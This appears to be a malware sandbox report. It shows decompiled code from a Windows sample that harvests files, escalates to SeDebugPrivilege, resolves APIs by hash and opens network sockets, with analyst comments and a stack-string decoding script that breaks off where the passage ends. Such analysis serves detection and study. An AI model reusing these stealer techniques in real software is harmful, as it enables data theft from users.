                                          				if(_a16 == 0) {
                                          					L15:
                                          					_push(_a8);
                                          					_t32 = E00405B6F(0, L"%s\\%s", _a4); // executed
                                          					_t98 = _t32;
                                          					_t104 = _t103 + 0xc;
                                          					if(_t98 == 0) {
                                          						L30:
                                          						__eflags = 0;
                                          						return 0;
                                          					}
                                          					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                                          					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                                          					_t73 = _t35;
                                          					if(_t73 == 0xffffffff) {
                                          						L29:
                                          						E00402BAB(_t98);
                                          						goto L30;
                                          					}
                                          					L17:
                                          					while(1) {
                                          						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                                          							if(_v596.dwFileAttributes != 0x10) {
                                          								L21:
                                          								_push( &(_v596.cFileName));
                                          								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                                          								_t104 = _t104 + 0xc;
                                          								if(_t101 == 0) {
                                          									goto L24;
                                          								}
                                          								if(_a12 == 0) {
                                          									E00402BAB(_t98);
                                          									E00403BEF(_t73);
                                          									return _t101;
                                          								}
                                          								_a12(_t101);
                                          								E00402BAB(_t101);
                                          								goto L24;
                                          							}
                                          							_t124 = _a20;
                                          							if(_a20 == 0) {
                                          								goto L24;
                                          							}
                                          							goto L21;
                                          						} else {
                                          							L24:
                                          							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                                          							_t43 = FindNextFileW(_t73,  &_v596); // executed
                                          							if(_t43 == 0) {
                                          								E00403BEF(_t73); // executed
                                          								goto L29;
                                          							}
                                          							_t100 = 0x2e;
                                          							continue;
                                          						}
                                          					}
                                          				}
                                          				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                                          				if(_t102 == 0) {
                                          					L14:
                                          					_t100 = 0x2e;
                                          					goto L15;
                                          				}
                                          				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                                          				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                                          				_t74 = _t52;
                                          				if(_t74 == 0xffffffff) {
                                          					L13:
                                          					E00402BAB(_t102);
                                          					_t72 = 0;
                                          					goto L14;
                                          				} else {
                                          					goto L3;
                                          				}
                                          				do {
                                          					L3:
                                          					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                          						goto L11;
                                          					}
                                          					if(_a24 == 0) {
                                          						L7:
                                          						if(E00405D24( &(_v596.cFileName)) >= 3) {
                                          							L9:
                                          							_push( &(_v596.cFileName));
                                          							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                                          							_t103 = _t103 + 0xc;
                                          							_a16 = _t60;
                                          							_t115 = _t60;
                                          							if(_t60 == 0) {
                                          								goto L11;
                                          							}
                                          							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                                          							E00402BAB(_a16);
                                          							_t103 = _t103 + 0x1c;
                                          							if(_t99 != 0) {
                                          								E00402BAB(_t102);
                                          								E00403BEF(_t74);
                                          								return _t99;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t66 = 0x2e;
                                          						_t114 = _v596.cFileName - _t66;
                                          						if(_v596.cFileName == _t66) {
                                          							goto L11;
                                          						}
                                          						goto L9;
                                          					}
                                          					_push(L"Windows");
                                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                          						goto L11;
                                          					}
                                          					_push(L"Program Files");
                                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                          						goto L11;
                                          					}
                                          					goto L7;
                                          					L11:
                                          					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                                          					_t56 = FindNextFileW(_t74,  &_v596); // executed
                                          				} while (_t56 != 0);
                                          				E00403BEF(_t74); // executed
                                          				goto L13;
			}

                                          Per-line instruction addresses for E00403D74 (shown as a detached column in the extracted layout): 0x00403d82 to 0x00403f95

                                          APIs
                                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID: %s\%s$%s\*$Program Files$Windows
                                          • API String ID: 1690352074-2009209621
                                          • Opcode ID: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                          • Opcode Fuzzy Hash: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                                          				void* _v8;
                                          				struct _LUID _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				struct _TOKEN_PRIVILEGES _v32;
                                          				intOrPtr* _t13;
                                          				void* _t14;
                                          				int _t16;
                                          				int _t31;
                                          				void* _t32;
                                          
                                          				_t31 = 0;
                                          				E004060AC();
                                          				_t32 = __eax;
                                          				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                          				_t14 =  *_t13(_t32, 0x28,  &_v8);
                                          				if(_t14 != 0) {
                                          					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                                          					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                                          					if(_t16 != 0) {
                                          						_push(__ebx);
                                          						_v32.Privileges = _v16.LowPart;
                                          						_v32.PrivilegeCount = 1;
                                          						_v24 = _v16.HighPart;
                                          						_v20 = 2;
                                          						E004031E5(1, 9, 0xc1642df2, 0, 0);
                                          						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                                          						_t31 =  !=  ? 1 : 0;
                                          					}
                                          					E00403C40(_v8);
                                          					return _t31;
                                          				}
                                          				return _t14;
                                          			}

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 3615134276-2896544425
                                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00402B7C(long _a4) {
                                          				void* _t4;
                                          				void* _t7;
                                          
                                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                          				_t7 = _t4;
                                          				if(_t7 != 0) {
                                          					E00402B4E(_t7, 0, _a4);
                                          				}
                                          				return _t7;
                                          			}

                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID:
                                          • API String ID: 1357844191-0
                                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406069(WCHAR* _a4, DWORD* _a8) {
                                          				int _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                                          				_t4 = GetUserNameW(_a4, _a8); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                                          				int _v8;
                                          				long _v12;
                                          				int _v16;
                                          				int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				intOrPtr* _t25;
                                          				int _t27;
                                          				int _t30;
                                          				int _t31;
                                          				int _t36;
                                          				int _t37;
                                          				intOrPtr* _t39;
                                          				int _t40;
                                          				long _t44;
                                          				intOrPtr* _t45;
                                          				int _t46;
                                          				void* _t48;
                                          				int _t49;
                                          				void* _t67;
                                          				void* _t68;
                                          				void* _t74;
                                          
                                          				_t48 = __ebx;
                                          				_t67 = 0;
                                          				_v8 = 0;
                                          				E00402BF2();
                                          				_t68 = __eax;
                                          				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                                          				_t2 =  &_v8; // 0x414449
                                          				_push(1);
                                          				_push(8);
                                          				_push(_t68);
                                          				if( *_t25() != 0) {
                                          					L4:
                                          					_t27 = E00402B7C(0x208);
                                          					_v20 = _t27;
                                          					__eflags = _t27;
                                          					if(_t27 != 0) {
                                          						E0040338C(_t27, _t67, 0x104);
                                          						_t74 = _t74 + 0xc;
                                          					}
                                          					_push(_t48);
                                          					_t49 = E00402B7C(0x208);
                                          					__eflags = _t49;
                                          					if(_t49 != 0) {
                                          						E0040338C(_t49, _t67, 0x104);
                                          						_t74 = _t74 + 0xc;
                                          					}
                                          					_v28 = 0x208;
                                          					_v24 = 0x208;
                                          					_t7 =  &_v8; // 0x414449
                                          					_v12 = _t67;
                                          					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                                          					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                                          					__eflags = _t30;
                                          					if(_t30 == 0) {
                                          						_t36 = E00402B7C(_v12);
                                          						_v16 = _t36;
                                          						__eflags = _t36;
                                          						if(_t36 != 0) {
                                          							_t14 =  &_v8; // 0x414449, executed
                                          							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                                          							__eflags = _t37;
                                          							if(_t37 != 0) {
                                          								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                                          								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                                          								__eflags = _t40;
                                          								if(__eflags != 0) {
                                          									_t67 = E00405B6F(__eflags, L"%s", _t49);
                                          								}
                                          							}
                                          							E00402BAB(_v16);
                                          						}
                                          					}
                                          					__eflags = _v8;
                                          					if(_v8 != 0) {
                                          						E00403C40(_v8); // executed
                                          					}
                                          					__eflags = _t49;
                                          					if(_t49 != 0) {
                                          						E00402BAB(_t49);
                                          					}
                                          					_t31 = _v20;
                                          					__eflags = _t31;
                                          					if(_t31 != 0) {
                                          						E00402BAB(_t31);
                                          					}
                                          					return _t67;
                                          				}
                                          				_t44 = GetLastError();
                                          				if(_t44 == 0x3f0) {
                                          					E004060AC();
                                          					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                          					_t3 =  &_v8; // 0x414449
                                          					_t46 =  *_t45(_t44, 8, _t3);
                                          					__eflags = _t46;
                                          					if(_t46 == 0) {
                                          						goto L2;
                                          					}
                                          					goto L4;
                                          				}
                                          				L2:
                                          				return 0;
                                          			}

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                          • _wmemset.LIBCMT ref: 00406244
                                          • _wmemset.LIBCMT ref: 00406261
                                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: _wmemset$ErrorInformationLastToken
                                          • String ID: IDA$IDA
                                          • API String ID: 487585393-2020647798
                                          • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                          • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				void _v40;
                                          				void* _t23;
                                          				signed int _t24;
                                          				signed int* _t25;
                                          				signed int _t30;
                                          				signed int _t31;
                                          				signed int _t33;
                                          				signed int _t41;
                                          				void* _t42;
                                          				signed int* _t43;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t33 = 8;
                                          				memset( &_v40, 0, _t33 << 2);
                                          				_v32 = 1;
                                          				_t23 =  &_v40;
                                          				_v28 = 6;
                                          				_v36 = 2;
                                          				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                                          				if(_t23 == 0) {
                                          					_t24 = E00402B7C(4);
                                          					_t43 = _t24;
                                          					_t31 = _t30 | 0xffffffff;
                                          					 *_t43 = _t31;
                                          					_t41 = _v8;
                                          					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                                          					 *_t43 = _t24;
                                          					if(_t24 != _t31) {
                                          						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                                          						if(_t24 == _t31) {
                                          							E00404DE5(_t24,  *_t43);
                                          							 *_t43 = _t31;
                                          						}
                                          						__imp__freeaddrinfo(_v8);
                                          						if( *_t43 != _t31) {
                                          							_t25 = _t43;
                                          							goto L10;
                                          						} else {
                                          							E00402BAB(_t43);
                                          							L8:
                                          							_t25 = 0;
                                          							L10:
                                          							return _t25;
                                          						}
                                          					}
                                          					E00402BAB(_t43);
                                          					__imp__freeaddrinfo(_v8);
                                          					goto L8;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                          • socket.WS2_32(?,?,?), ref: 00404E7A
                                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: freeaddrinfogetaddrinfosocket
                                          • String ID:
                                          • API String ID: 2479546573-0
                                          • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                          • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			// Reads the whole file _a4 into a VirtualAlloc'd buffer and returns it; the size goes to *_a8.
                                          			// The size comes from a hash-resolved call (constant 0xf9435d1e) with a GetFileSize-shaped
                                          			// signature (handle, &high dword); a non-zero high dword or a size above 0x40000000 aborts the read.
                                          			// If the open fails and _a12 is non-zero, a ".tmp" path is built (E00403C90), E00403C59 is run on
                                          			// the original and the new path (consistent with copying a locked file, e.g. a browser database,
                                          			// before reading it), and the function recurses on the copy with _a12 = 0 so it cannot loop.
                                          			// Every Win32 call is preceded by E004031E5 with a 32-bit constant: API resolution by hash.
                                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                          				char _v12;
                                          				long _v16;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* _t16;
                                          				intOrPtr* _t25;
                                          				long* _t28;
                                          				void* _t30;
                                          				int _t32;
                                          				intOrPtr* _t33;
                                          				void* _t35;
                                          				void* _t42;
                                          				intOrPtr _t43;
                                          				long _t44;
                                          				struct _OVERLAPPED* _t46;
                                          
                                          				_t46 = 0;
                                          				_t35 = 0;
                                          				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                                          				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_t42 = _t16;
                                          				_v8 = _t42;
                                          				if(_t42 == 0xffffffff) {
                                          					__eflags = _a12;
                                          					if(_a12 == 0) {
                                          						L10:
                                          						return _t35;
                                          					}
                                          					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                                          					__eflags = _t43;
                                          					if(_t43 == 0) {
                                          						goto L10;
                                          					}
                                          					_push(0);
                                          					__eflags = E00403C59(_a4, _t43);
                                          					if(__eflags != 0) {
                                          						_v8 = 0;
                                          						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                                          						_push(_t43);
                                          						 *_a8 = _v8;
                                          						E00403D44();
                                          					}
                                          					E00402BAB(_t43);
                                          					return _t46;
                                          				}
                                          				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                                          				_t44 =  *_t25(_t42,  &_v12);
                                          				if(_v12 != 0 || _t44 > 0x40000000) {
                                          					L8:
                                          					_t45 = _v8;
                                          					goto L9;
                                          				} else {
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 = _t44;
                                          					}
                                          					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                                          					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                                          					_t35 = _t30;
                                          					if(_t35 == 0) {
                                          						goto L8;
                                          					} else {
                                          						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                                          						_t45 = _v8;
                                          						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                                          						if(_t32 == 0) {
                                          							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                                          							 *_t33(_t35, _t46, 0x8000);
                                          							_t35 = _t46;
                                          						}
                                          						L9:
                                          						E00403C40(_t45); // executed
                                          						goto L10;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: File$AllocCreateReadVirtual
                                          • String ID: .tmp
                                          • API String ID: 3585551309-2986845003
                                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			// Startup routine. SetErrorMode(3) = SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX suppresses
                                          			// error dialogs. The 16-bit immediates below build three stack strings, "OLEAUT32.dll" (_v76..),
                                          			// "ws2_32.dll" (_v48..) and "ole32.dll" (_v24..), each passed to the import resolved from hash
                                          			// 0xe811e8d4. A named mutex (name from E00413D97) is then created; GetLastError() == 0xb7 is
                                          			// ERROR_ALREADY_EXISTS, i.e. another instance is already running, and E00413B81(0) runs first.
                                          			E00413866(void* __eflags) {
                                          				short _v6;
                                          				short _v8;
                                          				short _v10;
                                          				short _v12;
                                          				short _v14;
                                          				short _v16;
                                          				short _v18;
                                          				short _v20;
                                          				short _v22;
                                          				char _v24;
                                          				short _v28;
                                          				short _v30;
                                          				short _v32;
                                          				short _v34;
                                          				short _v36;
                                          				short _v38;
                                          				short _v40;
                                          				short _v42;
                                          				short _v44;
                                          				short _v46;
                                          				char _v48;
                                          				short _v52;
                                          				short _v54;
                                          				short _v56;
                                          				short _v58;
                                          				short _v60;
                                          				short _v62;
                                          				short _v64;
                                          				short _v66;
                                          				short _v68;
                                          				short _v70;
                                          				short _v72;
                                          				short _v74;
                                          				char _v76;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* _t38;
                                          				short _t43;
                                          				short _t44;
                                          				short _t45;
                                          				short _t46;
                                          				short _t47;
                                          				short _t48;
                                          				short _t50;
                                          				short _t51;
                                          				short _t52;
                                          				short _t54;
                                          				short _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t59;
                                          				intOrPtr* _t61;
                                          				void* _t63;
                                          				WCHAR* _t65;
                                          				long _t68;
                                          				void* _t75;
                                          				short _t76;
                                          				short _t78;
                                          				short _t83;
                                          				short _t84;
                                          				short _t85;
                                          
                                          				E00402C6C(_t38);
                                          				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                                          				SetErrorMode(3); // executed
                                          				_t43 = 0x4f;
                                          				_v76 = _t43;
                                          				_t44 = 0x4c;
                                          				_v74 = _t44;
                                          				_t45 = 0x45;
                                          				_v72 = _t45;
                                          				_t46 = 0x41;
                                          				_v70 = _t46;
                                          				_t47 = 0x55;
                                          				_v68 = _t47;
                                          				_t48 = 0x54;
                                          				_t76 = 0x33;
                                          				_t84 = 0x32;
                                          				_t83 = 0x2e;
                                          				_t78 = 0x64;
                                          				_t85 = 0x6c;
                                          				_v66 = _t48;
                                          				_v52 = 0;
                                          				_t50 = 0x77;
                                          				_v48 = _t50;
                                          				_t51 = 0x73;
                                          				_v46 = _t51;
                                          				_t52 = 0x5f;
                                          				_v42 = _t52;
                                          				_v28 = 0;
                                          				_t54 = 0x6f;
                                          				_v24 = _t54;
                                          				_t55 = 0x65;
                                          				_v20 = _t55;
                                          				_v64 = _t76;
                                          				_v62 = _t84;
                                          				_v60 = _t83;
                                          				_v58 = _t78;
                                          				_v56 = _t85;
                                          				_v54 = _t85;
                                          				_v44 = _t84;
                                          				_v40 = _t76;
                                          				_v38 = _t84;
                                          				_v36 = _t83;
                                          				_v34 = _t78;
                                          				_v32 = _t85;
                                          				_v30 = _t85;
                                          				_v22 = _t85;
                                          				_v18 = _t76;
                                          				_v16 = _t84;
                                          				_v14 = _t83;
                                          				_v12 = _t78;
                                          				_v10 = _t85;
                                          				_v8 = _t85;
                                          				_v6 = 0;
                                          				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                          				 *_t57( &_v76);
                                          				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                          				 *_t59( &_v48);
                                          				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                          				_t81 =  &_v24;
                                          				 *_t61( &_v24); // executed
                                          				_t63 = E00414059(); // executed
                                          				if(_t63 != 0) {
                                          					_t65 = E00413D97(0);
                                          					E004031E5(0, 0, 0xcf167df4, 0, 0);
                                          					CreateMutexW(0, 1, _t65); // executed
                                          					_t68 = GetLastError();
                                          					_t92 = _t68 - 0xb7;
                                          					if(_t68 == 0xb7) {
                                          						E00413B81(0);
                                          						_pop(_t81); // executed
                                          					}
                                          					E00413003(_t92); // executed
                                          					E00412B2E(_t92); // executed
                                          					E00412D31(_t81, _t84); // executed
                                          					E00413B3F();
                                          					E00413B81(0);
                                          					 *0x49fdd0 = 1;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                          • GetLastError.KERNEL32 ref: 0041399E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Error$CreateLastModeMutex
                                          • String ID:
                                          • API String ID: 3448925889-0
                                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                          Uniqueness

                                          Uniqueness Score: -1.00%
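The E00413866 listing above hides its DLL names as stack strings: one 16-bit immediate per _vNN slot, sometimes staged through a _tNN temporary first, terminated by a zero slot. Recovering them by hand is error-prone, so the following is an added Python example (not part of the report, the sandbox, or the sample) that parses assignments of that shape out of decompiler text and rebuilds the strings. The embedded input is the assignment block copied from the listing above, compacted to several statements per line; slot offsets are taken as distance below the frame pointer, so walking them from the highest offset down reads memory in ascending address order.

```python
import re

# Constructed input: the stack-string assignments copied from the E00413866 listing above,
# several statements per line to keep the sample short. Any other decompiler output with
# the same "_vNN = <literal or _tNN>" shape can be fed in the same way.
SAMPLE = """
_t43 = 0x4f; _v76 = _t43; _t44 = 0x4c; _v74 = _t44; _t45 = 0x45; _v72 = _t45;
_t46 = 0x41; _v70 = _t46; _t47 = 0x55; _v68 = _t47; _t48 = 0x54;
_t76 = 0x33; _t84 = 0x32; _t83 = 0x2e; _t78 = 0x64; _t85 = 0x6c;
_v66 = _t48; _v52 = 0; _t50 = 0x77; _v48 = _t50; _t51 = 0x73; _v46 = _t51;
_t52 = 0x5f; _v42 = _t52; _v28 = 0; _t54 = 0x6f; _v24 = _t54; _t55 = 0x65; _v20 = _t55;
_v64 = _t76; _v62 = _t84; _v60 = _t83; _v58 = _t78; _v56 = _t85; _v54 = _t85;
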